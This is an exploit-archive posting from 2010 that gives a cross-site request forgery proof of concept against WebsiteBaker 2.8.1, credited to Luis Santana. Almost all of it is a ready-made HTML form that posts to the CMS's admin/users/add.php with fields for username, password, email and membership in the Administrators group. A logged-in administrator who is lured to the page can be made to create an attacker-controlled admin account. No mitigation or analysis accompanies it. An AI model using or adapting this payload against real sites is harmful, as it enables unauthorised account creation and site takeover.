Home / os / win7

WebsiteBaker 2.8.1 CSRF Vulnerability

Posted on 19 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>WebsiteBaker 2.8.1 CSRF Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================== WebsiteBaker 2.8.1 CSRF Vulnerability ===================================== # Author: Luis Santana # Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&amp;id=1269641667 # Version: 2.8.1 # Tested on: All Regards, Luis Santana Admin - http://hacktalk.net HackTalk Security &lt;h1&gt;WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security&lt;/h1&gt; &lt;form name=&quot;user&quot;action=&quot;http://demo.opensourcecms.com/websitebaker/admin/users/add.php&quot; method=&quot;post&quot; class=&quot;&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;user_id&quot; value=&quot;&quot; /&gt; &lt;input type=&quot;hidden&quot; name=&quot;username_fieldname&quot; value=&quot;username_08y7h65u&quot; /&gt; &lt;table cellpadding=&quot;5&quot; cellspacing=&quot;0&quot; border=&quot;0&quot; width=&quot;100%&quot;&gt; &lt;tr&gt; &lt;td width=&quot;150&quot;&gt;Username:&lt;/td&gt; &lt;td class=&quot;value_input&quot;&gt; &lt;input type=&quot;text&quot; name=&quot;username_08y7h65u&quot; maxlength=&quot;30&quot; value=&quot;&quot; /&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;Password:&lt;/td&gt; &lt;td class=&quot;value_input&quot;&gt; &lt;input type=&quot;password&quot; name=&quot;password&quot; maxlength=&quot;30&quot; /&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;Re-type Password:&lt;/td&gt; &lt;td class=&quot;value_input&quot;&gt; &lt;input type=&quot;password&quot; name=&quot;password2&quot; maxlength=&quot;30&quot; /&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr style=&quot;display:none;&quot;&gt; &lt;td&gt; &lt;/td&gt; &lt;td style=&quot;font-size: 10px;&quot;&gt; Please note: You should only enter values in the above fields if you wish to change this users password &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;Display Name:&lt;/td&gt; &lt;td class=&quot;value_input&quot;&gt; &lt;input type=&quot;text&quot; name=&quot;display_name&quot; maxlength=&quot;255&quot; value=&quot;&quot; /&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;Email:&lt;/td&gt; &lt;td class=&quot;value_input&quot;&gt; &lt;input type=&quot;text&quot; name=&quot;email&quot; maxlength=&quot;255&quot; value=&quot;&quot; /&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr style=&quot;&quot;&gt; &lt;td&gt;Home Folder:&lt;/td&gt; &lt;td class=&quot;value_input&quot;&gt; &lt;select name=&quot;home_folder&quot;&gt; &lt;option value=&quot;&quot;&gt;None&lt;/option&gt; &lt;option value=&quot;/testbild&quot; &gt;/media/testbild&lt;/option&gt; &lt;/select&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt;Group:&lt;/td&gt; &lt;td class=&quot;value_input&quot;&gt; &lt;select name=&quot;groups[]&quot; multiple=&quot;multiple&quot; size=&quot;5&quot;&gt; &lt;option value=&quot;1&quot; &gt;Administrators&lt;/option&gt; &lt;/select&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt; &lt;/td&gt; &lt;td&gt; &lt;input type=&quot;radio&quot; name=&quot;active[]&quot; id=&quot;active&quot; value=&quot;1&quot; checked=&quot;checked&quot; /&gt; &lt;label for=&quot;active&quot;&gt;Active&lt;/label&gt; &lt;input type=&quot;radio&quot; name=&quot;active[]&quot; id=&quot;disabled&quot; value=&quot;0&quot; /&gt; &lt;label for=&quot;disabled&quot;&gt;Disabled&lt;/label&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td&gt; &lt;/td&gt; &lt;td&gt; &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Add&quot; /&gt; &lt;input type=&quot;reset&quot; name=&quot;reset&quot; value=&quot;Reset&quot; /&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/form&gt; &lt;p&gt;Greetz to Shardy, Xires and Stacy, Rage, and n3xus&lt;/p&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-19]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP